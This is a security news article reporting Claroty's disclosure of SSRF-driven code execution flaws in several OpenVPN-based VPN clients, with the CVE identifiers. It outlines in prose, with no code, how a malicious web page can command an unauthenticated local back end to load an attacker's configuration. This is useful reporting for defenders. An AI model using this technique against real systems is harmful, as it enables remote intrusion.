Security Experts:

Connect with us

Hi, what are you looking for?


Application Security

Severe Code Execution Vulnerabilities Affect OpenVPN-Based Applications

Security researchers at Claroty have raised the alarm for a series of severe code execution vulnerabilities affecting virtual private network (VPN) solutions relying on OpenVPN.

Security researchers at Claroty have raised the alarm for a series of severe code execution vulnerabilities affecting virtual private network (VPN) solutions relying on OpenVPN.

The company documented four security errors in products from HMS Industrial Networks, MB connect line, PerFact, and Siemens that allow attackers to achieve code execution by tricking potential victims into visiting a maliciously crafted web page.

VPN solutions are designed to provide users with means to encrypt the traffic flowing between their devices and a specific network, to ensure that potentially sensitive data is transmitted securely, and OpenVPN is the most common implementation of a VPN solution.

During its analysis of OpenVPN-based solutions, Claroty discovered that vendors usually deploy OpenVPN as a service with SYSTEM privileges, which poses security risks, because any remote or local applications can control an OpenVPN instance to initiate or terminate a secured connection.

Typically, a VPN client-server architecture involves the presence of a front end (a GUI application), a back end (which receives commands from the front-end), and OpenVPN (a service controlled by the back end and responsible for the VPN connection).

Because in most cases cleartext protocol is used within the dedicated socket channel through which the front end controls the back end, without any form of authentication, “anyone with access to the local TCP port the back end listens on, could potentially load an OpenVPN config and force the back end to spawn a new OpenVPN instance with this configuration,” Claroty explained.

[ READ: NSA, CISA Issue Guidance on Selecting and Securing VPNs ]

 An attacker looking to exploit this flaw would simply need to trick the victim into accessing a malicious website containing embedded JavaScript code designed to send a blind POST request locally, to inject commands in the VPN client back end. This is a classic Server-Side Request Forgery (SSRF) case, the company said.

“Once the victim clicks the link, a HTTP POST request will be fired locally to the dedicated TCP port, and since HTTP is a cleartext based protocol which every line ends with n, the back end server will read and ignore all the lines until reaching a meaningful command,” according to Claroty’s documentation.

Because the back end server will automatically parse and execute any valid commands it may receive, it could be instructed to load a remote configuration file containing specific commands leading to code execution or the installation of malicious payloads.

“The attacker does not need to set up a dedicated OpenVPN server of their own because the up OpenVPN directive command is being executed before the connection to the OpenVPN server occurs,” Claroty said.

To achieve remote code execution, however, access to the attacker-controlled SMB server is needed, meaning that the attacker needs to either be on the domain network with the target system, or the victim computer set to allow SMB access to external servers, the researchers note.

A total of five CVE identifiers were issued based on Claroty’s research: CVE-2020-14498 (CVSS 9.6 – HMS Industrial Networks AB’s eCatcher), CVE-2021-27406 (CVSS 8.8 – PerFact’s OpenVPN-Client), CVE-2021-31338 (CVSS 7.8 – Siemens’ SINEMA RC Client), and CVE-2021-33526 and CVE-2021-33527 (CVSS 7.8 – MB connect line GmbH’s mbConnect Dialup).

Related: NSA, CISA Issue Guidance on Selecting and Securing VPNs

Related: Tens of Thousands of Unpatched Fortinet VPNs Hacked via Old Security Flaw

Written By

Ionut Arghire is an international correspondent for SecurityWeek.

Click to comment

Expert Insights

Related Content

Application Security

Cycode, a startup that provides solutions for protecting software source code, emerged from stealth mode on Tuesday with $4.6 million in seed funding.


Websites of German airports, administration bodies and banks were hit by DDoS attacks attributed to Russian hacker group Killnet

Network Security

NSA publishes guidance to help system administrators identify and mitigate cyber risks associated with transitioning to IPv6.


The North Korean APT tracked as TA444 is either moonlighting from its previous primary purpose, expanding its attack repertoire, or is being impersonated by...

Malware & Threats

Microsoft plans to improve the protection of Office users by blocking XLL add-ins from the internet.

Identity & Access

Hackers rarely hack in anymore. They log in using stolen, weak, default, or otherwise compromised credentials. That’s why it’s so critical to break the...

Cloud Security

VMware vRealize Log Insight vulnerability allows an unauthenticated attacker to take full control of a target system.

IoT Security

Lexmark warns of a remote code execution (RCE) vulnerability impacting over 120 printer models, for which PoC code has been published.